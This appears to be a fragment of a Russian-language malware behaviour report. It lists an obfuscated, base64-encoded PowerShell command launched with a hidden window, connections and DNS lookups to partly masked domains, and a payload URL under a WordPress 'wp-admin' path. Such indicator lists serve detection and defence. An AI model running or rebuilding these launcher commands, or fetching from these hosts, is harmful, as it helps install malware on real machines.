Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABCAGgASQA5AEQARwA9ACcAdgBoAFEAQgBHAHUAJwA7ACQARwBrAG4AZgBwAGoARAAgAD0AIAAnADIANAA3ACcAOwAkAE0AbwBLAF8AagBBAD0AJwBEAGgASgB0AGEAbgAnADsAJABMAEEAVwBuAHcAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcg...
- 'vi####adatours.com':443
- 'vi###-gift.com':80
- 're###it.co.ke':443
- http://www.vi###-gift.com/wp-admin/wuysk6u_k68ce1sdu-101546798/
- 're###it.co.ke':443
- DNS ASK as######eviewbinhphuoc.com
- DNS ASK vi####adatours.com
- DNS ASK vi###-gift.com
- DNS ASK re###it.co.ke
- DNS ASK pa#####zlojistik.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABCAGgASQA5AEQARwA9ACcAdgBoAFEAQgBHAHUAJwA7ACQARwBrAG4AZgBwAGoARAAgAD0AIAAnADIANAA3ACcAOwAkAE0AbwBLAF8AagBBAD0AJwBEAGgASgB0AGEAbgAnADsAJABMAEEAVwBuAHcAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcg...' (со скрытым окном)